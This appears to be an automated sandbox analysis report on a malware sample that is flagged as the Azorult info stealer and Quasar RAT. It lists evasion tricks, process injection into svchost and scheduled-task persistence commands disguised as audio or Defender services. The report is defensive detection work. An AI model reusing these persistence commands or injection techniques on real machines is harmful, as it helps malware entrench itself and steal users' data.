Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Local\Temp\windef.exe TID: 4128	Thread sleep time: -30000s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe TID: 5872	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Local\Temp\windef.exe

Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\windef.exe

Thread delayed: delay time: 922337203685477

Source: SystemPropertiesPerformance.exe, 0000000A.00000002.941562165.00000000017DC000.00000004.00000001.sdmp	Binary or memory string: vmtoolsd.exe
Source: svchost.exe, 00000005.00000000.720666690.0000020DCBE1F000.00000004.00000001.sdmp, windef.exe, 00000006.00000002.720199755.0000000005849000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00DB49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00E1445A GetFileAttributesW,FindFirstFileW,FindClose,	1_2_00E1445A
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C7FDA0 memset,lstrlenW,lstrlenW,HeapAlloc,lstrcpyW,lstrcatW,lstrcatW,memset,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,DeleteFileW,FindNextFileW,FindClose,lstrcpyW,lstrcatW,lstrcatW,memset,RemoveDirectoryW,	5_2_00C7FDA0
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C76554 memset,lstrlenW,HeapAlloc,lstrcpyW,lstrcatW,memset,FindFirstFileW,lstrlenW,HeapAlloc,lstrcpyW,lstrcatW,SetLastError,FindNextFileW,FindClose,SetLastError,	5_2_00C76554
Source: C:\Windows\System32\svchost.exe	Code function: 5_2_00C7FFA8 memset,lstrlenW,HeapAlloc,lstrcpyW,lstrcatW,lstrlenW,HeapAlloc,lstrcpyW,CreateDirectoryW,GetLastError,FindFirstFileW,GetLastError,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,HeapFree,	5_2_00C7FFA8
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00E1445A GetFileAttributesW,FindFirstFileW,FindClose,	7_2_00E1445A
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00413030 FindFirstFileW,FindNextFileW,FindClose,	7_2_00413030
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_004119A8 FindFirstFileW,FindNextFileW,FindClose,	7_2_004119A8
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_004119AC FindFirstFileW,FindNextFileW,FindClose,	7_2_004119AC
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00412D6C FindFirstFileW,FindNextFileW,FindClose,	7_2_00412D6C
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_0041160C FindFirstFileW,FindNextFileW,FindClose,	7_2_0041160C
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,	7_2_00413F58
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,	7_2_00413F58
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00AA445A GetFileAttributesW,FindFirstFileW,FindClose,	10_2_00AA445A

Anti Debugging:

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00DB4B37 LoadLibraryA,GetProcAddress,

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_3_037F00BE mov esi, dword ptr fs:[00000030h]	1_3_037F00BE
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_3_037F00BE mov esi, dword ptr fs:[00000030h]	1_3_037F00BE
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00407AF0 mov eax, dword ptr fs:[00000030h]	7_2_00407AF0
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_3_014C00BE mov esi, dword ptr fs:[00000030h]	10_3_014C00BE
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_3_014C00BE mov esi, dword ptr fs:[00000030h]	10_3_014C00BE

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00DB3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00DE5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

1_2_00DE5A7C

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00DE97A2 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

1_2_00DE97A2

Enables debug privileges

Source: C:\Users\user\AppData\Local\Temp\windef.exe

Process token adjusted: Debug

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\System32\svchost.exe

Code function: 5_2_00C9A002 LdrLoadDll,

5_2_00C9A002

Source: C:\Users\user\AppData\Local\Temp\windef.exe

Memory allocated: page read and write | page guard

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 1_2_00DDA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00DDA155
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_00DDA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00DDA155
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Code function: 10_2_00A6A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00A6A155

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Temp\vnc.exe

Section loaded: unknown target: C:\Windows\System32\svchost.exe protection: execute and read and write

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\vnc.exe

Memory allocated: C:\Windows\System32\svchost.exe base: D00000 protect: page execute and read and write

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Memory written: C:\Users\user\Desktop\CVbJSUXraQ.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Memory written: C:\Users\user\btpanui\SystemPropertiesPerformance.exe base: 400000 value starts with: 4D5A			Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_3_037F00BE CreateProcessW,GetThreadContext,ReadProcessMemory,VirtualAlloc,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualProtectEx,VirtualFree,WriteProcessMemory,SetThreadContext,ResumeThread,

1_3_037F00BE

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF6EB844380	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Memory written: C:\Windows\System32\svchost.exe base: D00000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF6EB844380	Jump to behavior

.NET source code references suspicious native API functions

Source: winsock.exe.6.dr, u218f?uf56e???ufffd????u25e0??????u20e0uf421.cs	Reference to suspicious API methods: ('????????????????????', 'LoadLibrary@kernel32.dll'), ('????????????????????', 'GetProcAddress@kernel32.dll')
Source: winsock.exe.6.dr, ??uf019??u2720???uf88au171b???????u222f?.cs	Reference to suspicious API methods: ('????????????????????', 'MapVirtualKeyEx@user32.dll')
Source: 6.0.windef.exe.f10000.0.unpack, u218f?uf56e???ufffd????u25e0??????u20e0uf421.cs	Reference to suspicious API methods: ('????????????????????', 'LoadLibrary@kernel32.dll'), ('????????????????????', 'GetProcAddress@kernel32.dll')
Source: 6.0.windef.exe.f10000.0.unpack, ??uf019??u2720???uf88au171b???????u222f?.cs	Reference to suspicious API methods: ('????????????????????', 'MapVirtualKeyEx@user32.dll')
Source: 6.2.windef.exe.f10000.0.unpack, ??uf019??u2720???uf88au171b???????u222f?.cs	Reference to suspicious API methods: ('????????????????????', 'MapVirtualKeyEx@user32.dll')
Source: 6.2.windef.exe.f10000.0.unpack, u218f?uf56e???ufffd????u25e0??????u20e0uf421.cs	Reference to suspicious API methods: ('????????????????????', 'LoadLibrary@kernel32.dll'), ('????????????????????', 'GetProcAddress@kernel32.dll')

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Local\Temp\vnc.exe

Thread register set: target process: 5200

Contains functionality to simulate keystroke presses

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00DB48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

1_2_00DB48D7

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process created: C:\Users\user\AppData\Local\Temp\vnc.exe 'C:\Users\user\AppData\Local\Temp\vnc.exe'	Jump to behavior
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe'	Jump to behavior
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process created: C:\Users\user\Desktop\CVbJSUXraQ.exe C:\Users\user\Desktop\CVbJSUXraQ.exe	Jump to behavior
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vnc.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks' /create /tn 'win defender run' /sc ONLOGON /tr 'C:\Users\user\AppData\Local\Temp\windef.exe' /rl HIGHEST /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Process created: C:\Users\user\AppData\Roaming\SubDir\winsock.exe C:\Users\user\AppData\Roaming\SubDir\winsock.exe	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process created: C:\Users\user\AppData\Local\Temp\vnc.exe 'C:\Users\user\AppData\Local\Temp\vnc.exe'	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe'	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process created: C:\Users\user\btpanui\SystemPropertiesPerformance.exe C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F	Jump to behavior

Contains functionality to launch a program with higher privileges

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00DB3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00E0874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

1_2_00E0874B

Source: CVbJSUXraQ.exe, 00000001.00000000.668612321.0000000000E64000.00000002.00020000.sdmp, CVbJSUXraQ.exe, 00000007.00000002.939474482.0000000000E64000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000000.695369238.0000000000AF4000.00000002.00020000.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: CVbJSUXraQ.exe, 00000001.00000002.944287940.0000000002350000.00000002.00020000.sdmp, vnc.exe, svchost.exe, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp	Binary or memory string: Program Manager
Source: CVbJSUXraQ.exe, SystemPropertiesPerformance.exe	Binary or memory string: Shell_TrayWnd
Source: CVbJSUXraQ.exe, 00000001.00000003.684502731.0000000001805000.00000004.00000001.sdmp, vnc.exe, svchost.exe, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp	Binary or memory string: GetProgmanWindow
Source: CVbJSUXraQ.exe, 00000001.00000002.944287940.0000000002350000.00000002.00020000.sdmp, vnc.exe, svchost.exe, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp	Binary or memory string: Progman
Source: CVbJSUXraQ.exe, 00000001.00000002.944287940.0000000002350000.00000002.00020000.sdmp, svchost.exe, 00000005.00000000.720749842.0000020DCC390000.00000002.00020000.sdmp, CVbJSUXraQ.exe, 00000007.00000002.942639016.0000000001DD0000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000002.942828030.00000000029A0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: CVbJSUXraQ.exe, 00000001.00000002.944000384.00000000016FA000.00000004.00000001.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000002.941562165.00000000017DC000.00000004.00000001.sdmp	Binary or memory string: [CLASS:Progman]
Source: SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp	Binary or memory string: explorerframe.dllshell32.dllexplorer.exewindows.immersiveshell.serviceprovider.dlltwinui.dllwpncore.dllauthui.dllpnidui.dllhgcpl.dllBINotifiedNewSessionEventStartMenuCacheFileReorderShellReadyEventShellDesktopSwitchEventwindows.immersiveshell.serviceprovider.dllCreateDesktopExACreateDesktopExWOpenDesktopAOpenDesktopWOpenInputDesktopSwitchDesktopSetThreadDesktopGetUserObjectInformationAGetUserObjectInformationWFlashWindowExFlashWindowGetCaretBlinkTimeTrackPopupMenuExSetShellWindowSetShellWindowExGetShellWindowSetTaskmanWindowGetTaskmanWindowSetProgmanWindowGetProgmanWindowSystemParametersInfoWSystemParametersInfoAgdi32.dllSetDIBitsToDeviceBitBltWinmm.dllPlaySoundAPlaySoundWsndPlaySoundAsndPlaySoundWBeepMessageBeepwaveOutOpendsound.dllDirectSoundCreateDirectSoundCaptureCreateDirectSoundFullDuplexCreate8DirectSoundFullDuplexCreateDirectSoundCreate8DirectSoundCaptureCreate8LoadLibraryWLoadLibraryExALoadLibraryExWGetProcAddressRegQueryValueExWRegGetValueWntdll.dllZwRaiseHardErrorNtRaiseHardErrorZwConnectPortNtConnectPortShell32.dllSHRestrictedSHGetSetSettingsUxTheme.dllSetThemeAppPropertiesDefWindowProcWDefWindowProcADefDlgProcWDefDlgProcADefFrameProcWDefFrameProcADefMDIChildProcWDefMDIChildProcACallWindowProcWCallWindowProcAGetMessageWGetMessageAPeekMessageWPeekMessageATranslateMessageGetCursorPosd3d10_1.dllSetCursorPosd3d10_1core.dlld3d10.dlld3d10core.dlld2d1.dllGetMessagePosOPENGL32.dlld3d9.dlld3d11.dllDxtrans.dllSetCaptureFlash6.ocxReleaseCaptureGetCaptureCreateDesktopACreateDesktopWCreateDXGIFactory1D3D10CreateDevice1Direct3DCreate9Direct3DCreate9Ex\ThemeApiPortRtlSetUnhandledExceptionFilterMessageBoxTimeoutAuser32Program ManagerProgmanSHELLDLL_DefViewFolderViewSysListView32Shell_TrayWndNotifyIconOverflowWindow/0#32770MSTaskSwWClassTrayNotifyWndtaskmgrversion.dllGetFileVersionInfoSizeWGetFileVersionInfoW1.3.6.1.4.1.311.2.1.12rY
Source: SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp	Binary or memory string: explorerframe.dllshell32.dllexplorer.exewindows.immersiveshell.serviceprovider.dlltwinui.dllwpncore.dllauthui.dllpnidui.dllhgcpl.dllBINotifiedNewSessionEventStartMenuCacheFileReorderShellReadyEventShellDesktopSwitchEventwindows.immersiveshell.serviceprovider.dllDefWindowProcWDefWindowProcADefDlgProcWDefDlgProcADefFrameProcWDefFrameProcADefMDIChildProcWDefMDIChildProcACallWindowProcWCallWindowProcAGetMessageWGetMessageAPeekMessageWPeekMessageATranslateMessageGetCursorPosd3d10_1.dllSetCursorPosd3d10_1core.dlld3d10.dlld3d10core.dlld2d1.dllGetMessagePosOPENGL32.dlld3d9.dlld3d11.dllDxtrans.dllSetCaptureFlash6.ocxReleaseCaptureGetCaptureCreateDesktopACreateDesktopWCreateDesktopExACreateDesktopExWOpenDesktopAOpenDesktopWOpenInputDesktopSwitchDesktopSetThreadDesktopGetUserObjectInformationAGetUserObjectInformationWFlashWindowExFlashWindowGetCaretBlinkTimeTrackPopupMenuExSetShellWindowSetShellWindowExGetShellWindowSetTaskmanWindowGetTaskmanWindowSetProgmanWindowGetProgmanWindowSystemParametersInfoWSystemParametersInfoAgdi32.dllSetDIBitsToDeviceBitBltWinmm.dllPlaySoundAPlaySoundWsndPlaySoundAsndPlaySoundWBeepMessageBeepwaveOutOpendsound.dllDirectSoundCreateDirectSoundCaptureCreateDirectSoundFullDuplexCreate8DirectSoundFullDuplexCreateDirectSoundCreate8DirectSoundCaptureCreate8LoadLibraryWLoadLibraryExALoadLibraryExWGetProcAddressRegQueryValueExWRegGetValueWntdll.dllZwRaiseHardErrorNtRaiseHardErrorZwConnectPortNtConnectPortShell32.dllSHRestrictedSHGetSetSettingsUxTheme.dllSetThemeAppPropertiesCreateDXGIFactory1D3D10CreateDevice1Direct3DCreate9Direct3DCreate9Ex\ThemeApiPortRtlSetUnhandledExceptionFilterMessageBoxTimeoutAuser32Program ManagerProgmanSHELLDLL_DefViewFolderViewSysListView32Shell_TrayWndNotifyIconOverflowWindow/0#32770MSTaskSwWClassTrayNotifyWndtaskmgr\version.dllGetFileVersionInfoSizeWGetFileVersionInfoW1.3.6.1.4.1.311.2.1.12rY
Source: CVbJSUXraQ.exe, 00000001.00000003.684502731.0000000001805000.00000004.00000001.sdmp, vnc.exe, svchost.exe, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp	Binary or memory string: SetProgmanWindow

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\System32\svchost.exe	Code function: GetWindowRect,GetWindowRect,GetWindowRect,RedrawWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetLocaleInfoW,CharUpperBuffW,memcpy,RedrawWindow,		5_2_00C83460
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: GetLocaleInfoA,		7_2_00404BA8

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\windef.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\windef.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\AppData\Local\Temp\vnc.exe

Code function: 4_2_00ACEA96 cpuid

4_2_00ACEA96

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00DD520A GetSystemTimeAsFileTime,__aulldiv,

1_2_00DD520A

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 7_2_004065F0 GetUserNameW,

7_2_004065F0

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe

Code function: 1_2_00DB49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

Stealing of Sensitive Information:

Yara detected Azorult Info Stealer

Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.3800000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.14d0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.3800000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.14d0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000003.755528047.0000000001869000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.755481459.0000000001886000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.755557311.00000000018A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671626163.0000000001804000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.755386297.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.790922233.00000000014D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.791563765.0000000001886000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.795274268.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671306839.00000000017E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671456955.00000000017CB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.790988055.000000000192E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671650973.0000000001805000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.941562165.00000000017DC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.794854333.0000000000401000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.689677970.000000000176B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.941883221.0000000001557000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671172624.00000000017CB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671475144.00000000017CB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.791810701.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671495263.0000000001804000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.686858693.000000000183D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.689148939.0000000003800000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671160297.0000000001794000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.690115376.0000000001805000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR

Yara detected Quasar RAT

Source: Yara match	File source: CVbJSUXraQ.exe, type: SAMPLE
Source: Yara match	File source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
